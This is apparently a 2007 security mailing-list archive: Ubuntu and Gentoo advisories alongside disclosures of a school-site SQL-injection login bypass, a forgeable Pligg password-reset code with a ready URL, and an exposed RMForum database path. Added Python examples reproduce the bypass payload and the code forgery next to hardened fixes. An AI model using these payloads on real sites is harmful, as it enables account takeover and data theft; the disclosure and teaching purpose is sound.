[USN-465-1] PulseAudio vulnerability

2007-05-26 Thread Kees Cook
===========================================================
Ubuntu Security Notice USN-465-1   May 25, 2007
pulseaudio vulnerability
CVE-2007-1804
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.04:
  pulseaudio   0.9.5-5ubuntu4.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Luigi Auriemma discovered multiple flaws in pulseaudio's network
processing code.  If an unauthenticated attacker sent specially crafted
requests to the pulseaudio daemon, it would crash, resulting in a denial
of service.


Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.1.diff.gz
  Size/MD5:16615 9d9b53272d9252e4927f0e51300f4fce

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.1.dsc
  Size/MD5: 1265 1474ef70032d18fe70b09047637bb2ac

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5.orig.tar.gz
  Size/MD5:  1145930 99b5d9efd4fce35cabb4ae5d0ebb230d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-browse0_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:11358 3f38fa55e3e2ec7b8476772c8046b100

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-dev_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:   181014 24bb58434084ba059fe03afee7e7c31a

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:11434 7182d91212fe96fe269635f1619098c3

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse0_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:   111078 16a55c91c20d58271a2ad0f77111874d

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio-esound-compat_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:27326 aafca78e8a359714d9261806ba0c883e

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-gconf_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:12706 7d73bbce987c1f8792e96e67cd865983

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-hal_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:14738 656c160743b689e8c876180b19d85700

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-lirc_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5: 9102 aab1e8dc340901fc2ae6c648c56910e3

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-x11_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:15980 40d971c18451d46380b9880ac1db09e6

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-zeroconf_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:14446 87e590ceb4e0f241875eab95e42a7efa

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-utils_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:52658 038c6d8dcad7aefc338f565349dcc7bd

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.1_amd64.deb
  Size/MD5:   331022 19c1f526d3c61cdee453fb3527405983

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-browse0_0.9.5-5ubuntu4.1_i386.deb
  Size/MD5:10692 9d8d4fd14f7659455357d9aed48f82a4

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-dev_0.9.5-5ubuntu4.1_i386.deb
  Size/MD5:   159072 be0f064914c83a102f1979a67063fb07

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.5-5ubuntu4.1_i386.deb
  Size/MD5:10862 a2aff8660f4e212552a11ee24bc67676

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse0_0.9.5-5ubuntu4.1_i386.deb
  Size/MD5:   100038 5705deb6ebb7e61e74cad9a6e812e22d

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio-esound-compat_0.9.5-5ubuntu4.1_i386.deb
  Size/MD5:25520 4f7907dd870e564bec851003009baa88

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-gconf_0.9.5-5ubuntu4.1_i386.deb
  Size/MD5:12084 10f2fe882feed2906037e0cfef22a601

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-hal_0.9.5-5ubuntu4.1_i386.deb
  Size/MD5:13602 9578081e9c654ebb4f320a10a63d56fc

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-lirc_0.9.5-5ubuntu4.1_i386.deb
  Size/MD5: 8820 66e9b2747e87d22e7ec1b6d4b62ee845

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-x11_0.9.5-5ubuntu4.1_i386.deb
  Size/MD5:14790 

Zindizayn Okul Web Sistemi v1.0 Sql VulnZ.

2007-05-26 Thread g0rk3m-31
# Script's Name : Zindizayn Okul Web Sistemi v1.0 (tr)

# Script's MainPage : http://www.okulwebsistemi.com

# Risk : Medium

# Found By : ShaFuck31

# Thanks : | The RéD | DesquneR | SaboTaqe | [EMAIL PROTECTED] | BLaSTER |

# Vulnerable file : mezungiris.asp & ogretmenkontrol.asp

#Vuln :
http://www.victim.com/ScriptPath/mezungiris.asp
http://www.victim.com/ScriptPath/ogretmenkontrol.asp

*** You Can Use 'or' For id & pass ;)

#Contact: g0rk3m-31 (at) HoTMaiL (dot) CoM [not add me ;)]

# I Cry When The Angels Will Deserve To Die ...
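The hint "use 'or' for id & pass" is the classic authentication bypass against a login form that concatenates both fields straight into its SQL. The post contains no source, so the following is an added illustration of that generic pattern, not the product's code: the table, column names and the sqlite3 stand-in for the real database are constructed assumptions, and the ASP concatenation is mirrored in Python so it runs offline. It shows the bypass succeeding against the concatenated query and failing against the same query with bound parameters.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed demo table (assumed names, not taken from the product)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ogretmen (kullanici TEXT, sifre TEXT, ad TEXT)")
    # Plaintext password only so the effect of the injection is visible in a
    # toy database; a real application stores a salted password hash instead.
    conn.execute("INSERT INTO ogretmen VALUES ('admin', 'S3cret!', 'Yonetici')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user_id: str, password: str):
    """Form fields concatenated into the WHERE clause, the pattern behind the
    post's 'use OR for id & pass' hint. Returns the display name on success."""
    sql = ("SELECT ad FROM ogretmen WHERE kullanici='" + user_id
           + "' AND sifre='" + password + "'")
    # With BYPASS in both fields the statement becomes
    #   ... WHERE kullanici='' or '1'='1' AND sifre='' or '1'='1'
    # and the trailing OR '1'='1' makes the whole predicate true.
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, user_id: str, password: str):
    """Same query with bound parameters: the driver sends the values separately,
    so quotes in the input can never alter the structure of the statement."""
    row = conn.execute(
        "SELECT ad FROM ogretmen WHERE kullanici=? AND sifre=?",
        (user_id, password),
    ).fetchone()
    return row[0] if row else None


# Payload sent as both the id and the password field, as the post suggests.
BYPASS = "' or '1'='1"


if __name__ == "__main__":
    db = build_demo_db()
    print("concatenated query, bypass payload:", login_vulnerable(db, BYPASS, BYPASS))
    print("parameterized query, bypass payload:", login_parameterized(db, BYPASS, BYPASS))
    print("parameterized query, real credentials:",
          login_parameterized(db, "admin", "S3cret!"))
```

The parameterized form is the fix; escaping quotes by hand is a weaker substitute because it has to be repeated correctly at every query site.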


Re: Pligg critical vulnerability

2007-05-26 Thread crazy frog crazy frog

Have you notified the Pligg developers? I think they have a well-defined
policy for disclosure.

On 5/25/07, 242th section [EMAIL PROTECTED] wrote:

Pligg critical vulnerability

Concerned version  : 9.5 and ?

Description :

Pligg is a flexible CMS based on PHP and MYSQL.

To reinitialize a forgotten password, Pligg follows a classical
process. A confirmation code is generated and sent by email to the
concerned user mail box. The user has to follow the link containing
the confirmation code and if the confirmation code is checked
successfully, the password is reinitialized to a pre-defined value.


you can find a part of the source code in charge of this check below :


WEB_ROOT/libs/html1.php

[…]

function generateHash($plainText, $salt = null) {
    if ($salt === null) {
        $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
    } else {
        $salt = substr($salt, 0, SALT_LENGTH);
    }
    return $salt . sha1($salt . $plainText);
}

[…]


WEB_ROOT/login.php :

[…]

$confirmationcode = $_GET['confirmationcode'];

if (generateHash($username, substr($confirmationcode, 0, SALT_LENGTH))
    == $confirmationcode) {

    $db->query('UPDATE `' . table_users . '` SET `user_pass` =
    "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`
    = "' . $username . '"');

[…]



Unfortunately, as you can read, for a given username you can easily
generate a confirmation code that successfully passes the following
check: if(generateHash($username, substr($confirmationcode, 0,
SALT_LENGTH)) == $confirmationcode)


Example :


Let's choose :
salt = 123456789

and,

username = admin

 we have :

sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7

and  thus :

confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

with the following url you can reinitialize the user admin password :


http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7


242th.section.




--
---
http://www.secgeeks.com
get a blog on SecGeeks :)
register here:-
http://secgeeks.com/user/register
rss feeds :-
http://secradar.com/node/feed

http://www.newskicks.com
Submit and kick for new stories from all around the world.
---
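The flaw in the quoted login.php check is that every input to generateHash() is under the attacker's control: the salt is read back out of the submitted confirmation code and the only other input is the username, so the check verifies nothing but the attacker's own arithmetic. The following is an added example, not Pligg code: it ports the quoted generateHash() to Python, forges a code exactly as the post describes, and places a hardened reset-token store beside it. SALT_LENGTH = 9 is an assumption taken from the 9-character salt in the post's example; the ResetTokenStore class and its method names are this example's own.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Assumption: SALT_LENGTH is 9, matching the 9-character salt "123456789"
# used in the post's worked example; the constant itself is not quoted.
SALT_LENGTH = 9


def generate_hash(plain_text: str, salt: Optional[str] = None) -> str:
    """Python port of the quoted generateHash(): salt . sha1(salt . plaintext)."""
    if salt is None:
        salt = hashlib.md5(secrets.token_hex(16).encode()).hexdigest()[:SALT_LENGTH]
    else:
        salt = salt[:SALT_LENGTH]
    return salt + hashlib.sha1((salt + plain_text).encode()).hexdigest()


def vulnerable_check(username: str, confirmation_code: str) -> bool:
    """The login.php test as quoted. The salt comes out of the attacker-supplied
    code and the plaintext is the public username: no secret is involved."""
    return generate_hash(username, confirmation_code[:SALT_LENGTH]) == confirmation_code


def forge_confirmation_code(username: str, salt: str = "123456789") -> str:
    """What the post describes: pick any salt, hash salt+username, prepend the salt."""
    return generate_hash(username, salt)


class ResetTokenStore:
    """Hardened replacement (this example's design, not Pligg's): the server mints
    an unguessable token per reset request, stores only its SHA-256 and compares
    in constant time. The token never derives from anything the user can pick."""

    def __init__(self) -> None:
        self._pending: Dict[str, str] = {}

    def issue(self, username: str) -> str:
        token = secrets.token_urlsafe(32)           # 256 bits of CSPRNG output
        self._pending[username] = hashlib.sha256(token.encode()).hexdigest()
        return token                                 # goes only into the e-mailed link

    def verify(self, username: str, presented: str) -> bool:
        expected = self._pending.get(username)
        if expected is None:
            return False                             # no reset pending for this user
        digest = hashlib.sha256(presented.encode()).hexdigest()
        if not hmac.compare_digest(expected, digest):
            return False
        del self._pending[username]                  # single use
        return True


if __name__ == "__main__":
    forged = forge_confirmation_code("admin")
    print("forged code:", forged)
    print("quoted check accepts it:", vulnerable_check("admin", forged))
    store = ResetTokenStore()
    print("hardened check accepts it:", store.verify("admin", forged))
```

A production version would also record an expiry alongside the stored digest and reject the token after it; the essential point is that the value in the link must be server-generated randomness looked up against stored state, not a function of public inputs.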


[ GLSA 200705-19 ] PHP: Multiple vulnerabilities

2007-05-26 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200705-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: PHP: Multiple vulnerabilities
  Date: May 26, 2007
  Bugs: #169372
ID: 200705-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

PHP contains several vulnerabilities including buffer and integer
overflows which could under certain conditions lead to the remote
execution of arbitrary code.

Background
==========

PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  dev-lang/php              < 5.2.2                        *>= 4.4.7
                                                                >= 5.2.2

Description
===========

Several vulnerabilities were found in PHP, most of them during the
Month Of PHP Bugs (MOPB) by Stefan Esser. The most severe of these
vulnerabilities are integer overflows in wbmp.c from the GD library
(CVE-2007-1001) and in the substr_compare() PHP 5 function
(CVE-2007-1375). Ilia Alshanetsky also reported a buffer overflow in
the make_http_soap_request() and in the user_filter_factory_create()
functions (CVE-2007-2510, CVE-2007-2511), and Stanislav Malyshev
discovered another buffer overflow in the bundled XMLRPC library
(CVE-2007-1864). Additionally, the session_regenerate_id() and the
array_user_key_compare() functions contain a double-free vulnerability
(CVE-2007-1484, CVE-2007-1521). Finally, there exist implementation
errors in the Zend engine, in the mb_parse_str(), the unserialize() and
the mail() functions and other elements.

Impact
======

Remote attackers might be able to exploit these issues in PHP
applications making use of the affected functions, potentially
resulting in the execution of arbitrary code, Denial of Service,
execution of scripted contents in the context of the affected site,
security bypass or information leak.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All PHP 5 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-lang/php-5.2.2

All PHP 4 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-lang/php-4.4.7

References
==========

  [ 1 ] CVE-2007-1001
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001
  [ 2 ] CVE-2007-1285
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1285
  [ 3 ] CVE-2007-1286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1286
  [ 4 ] CVE-2007-1484
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1484
  [ 5 ] CVE-2007-1521
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1521
  [ 6 ] CVE-2007-1583
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1583
  [ 7 ] CVE-2007-1700
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1700
  [ 8 ] CVE-2007-1701
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1701
  [ 9 ] CVE-2007-1711
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1711
  [ 10 ] CVE-2007-1717
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1717
  [ 11 ] CVE-2007-1718
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1718
  [ 12 ] CVE-2007-1864
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1864
  [ 13 ] CVE-2007-1900
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1900
  [ 14 ] CVE-2007-2509
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2509
  [ 15 ] CVE-2007-2510
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2510
  [ 16 ] CVE-2007-2511
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2511

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200705-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.


RMForum Database Disclosure Vulnerability

2007-05-26 Thread the_3dit0r
 
Xmor$ Security Vulnerability Research TM

# Title: RMForum Database Disclosure Vulnerability

# Author..: [the_Edit0r]
# Location ...: [Iran]
# Homepage ...: [Www.XmorS-sEcurity.coM]
[Www.XmorS.coM] [Www.XmorS.neT]
# Software ...: [RMForum] 
# Advisory ...: [Www.XmorS-sEurity.coM/advisory/webCMS_1.00.txt]
# Site Script : [http://sourceforge.net/projects/rm-forum/]


 ---proof Of Concept--

 www.example.com/[path]/rmforum.mdb

 --


# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]


[ GLSA 200705-20 ] Blackdown Java: Applet privilege escalation

2007-05-26 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200705-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Blackdown Java: Applet privilege escalation
  Date: May 26, 2007
  Bugs: #161835
ID: 200705-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The Blackdown JDK and the Blackdown JRE suffer from the multiple
unspecified vulnerabilities that already affected the Sun JDK and JRE.

Background
==========

Blackdown provides implementations of the Java Development Kit (JDK)
and the Java Runtime Environment (JRE).

Affected packages
=================

    -------------------------------------------------------------------
     Package                   /  Vulnerable  /            Unaffected
    -------------------------------------------------------------------
  1  dev-java/blackdown-jdk      < 1.4.2.03-r14         >= 1.4.2.03-r14
  2  dev-java/blackdown-jre      < 1.4.2.03-r14         >= 1.4.2.03-r14
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Chris Evans has discovered multiple buffer overflows in the Sun JDK and
the Sun JRE possibly related to various AWT and font layout functions.
Tom Hawtin has discovered an unspecified vulnerability in the Sun JDK
and the Sun JRE relating to unintended applet data access. He has also
discovered multiple other unspecified vulnerabilities in the Sun JDK
and the Sun JRE allowing unintended Java applet or application resource
acquisition. Additionally, a memory corruption error has been found in
the handling of GIF images with zero width field blocks.

Impact
======

An attacker could entice a user to run a specially crafted Java applet
or application that could read, write, or execute local files with the
privileges of the user running the JVM, access data maintained in other
Java applets, or escalate the privileges of the currently running Java
applet or application allowing for unauthorized access to system
resources.

Workaround
==========

Disable the nsplugin USE flag in order to prevent web applets from
being run.

Resolution
==========

Since there is no fixed update from Blackdown and since the flaw only
occurs in the applets, the nsplugin USE flag has been masked in the
portage tree. Emerge the ebuild again in order to fix the
vulnerability. Another solution is to switch to another Java
implementation such as the Sun implementation (dev-java/sun-jdk and
dev-java/sun-jre-bin).

# emerge --sync
# emerge --ask --oneshot --verbose dev-java/blackdown-jdk
# emerge --ask --oneshot --verbose dev-java/blackdown-jre

References
==========

  [ 1 ] CVE-2006-6731
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6731
  [ 2 ] CVE-2006-6736
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6736
  [ 3 ] CVE-2006-6737
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6737
  [ 4 ] CVE-2006-6745
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6745

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200705-20.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

